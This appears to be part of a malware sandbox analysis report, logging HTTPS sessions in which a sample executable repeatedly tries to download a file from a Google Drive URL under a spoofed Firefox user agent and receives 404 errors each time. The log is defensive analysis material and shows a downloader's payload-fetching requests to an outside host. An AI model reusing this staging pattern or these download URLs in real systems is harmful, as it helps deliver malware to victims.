                                                        2024-12-05 16:04:09 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 42 6d 56 7a 74 65 6e 77 50 6e 31 54 4c 72 74 6d 4f 6a 4e 49 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GBmVztenwPn1TLrtmOjNIQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.11.2049765142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:04:19 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:19 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:19 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-EtXWavYe5oppyNaK2ePbNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.11.2049766142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:04:20 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:20 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:20 GMT
                                                        Content-Security-Policy: script-src 'nonce-dzfoslekdVLnTmyg9QmvDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4o1auPodTVc1U8tdZnCmRNEnV4MrVkQZ-F6ewcygyrvkIfkGIwvDZQiE7yr88u0yt91Hh1_GAAGA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:04:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 71 6d 30 78 43 73 72 49 63 37 67 46 73 2d 48 75 4e 6c 76 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bqm0xCsrIc7gFs-HuNlvNg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.11.2049767142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:04:30 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:31 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:31 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-nvLkqm4aFAYZkj8kv9zNDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.11.2049768142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:04:31 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:31 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:31 GMT
                                                        Content-Security-Policy: script-src 'nonce-PalheP376nsrsJ1wdhzABQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5wr8Hr-ERYLSKXTQ39aHOvNGQ0UBQg06ByK_MSl9LnSPk7ejRANmOmy9cNXK0zp6kBJ0pgLdl_EA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:04:31 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 52 47 39 32 39 7a 4e 48 78 2d 56 5a 4a 6f 36 44 72 66 69 63 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GRG929zNHx-VZJo6DrficA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.11.2049769142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:04:42 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:42 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:42 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce--kFV5FRUscQcDaQAf4WyuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.11.2049770142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:04:42 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:43 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:42 GMT
                                                        Content-Security-Policy: script-src 'nonce-dBEiWtpriMk1vP6-CSsLsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5djuB6u451xkPbseAL2Fw74gu2-sYdnhC3ouDL0RL73a4EhlUSBQc4f1IESZpCPmNqgEciUnQ0ng
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:04:43 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 59 57 39 41 35 42 79 54 38 34 54 67 70 36 6a 54 50 6e 37 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5YW9A5ByT84Tgp6jTPn7Sg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.11.2049771142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:04:53 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:53 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:53 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-2N9DTjIyVkWo4GR7RD4uew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.11.2049772142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:04:53 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:04:54 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:04:54 GMT
                                                        Content-Security-Policy: script-src 'nonce-ZWCLr7XKLGW4va_yB5twHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
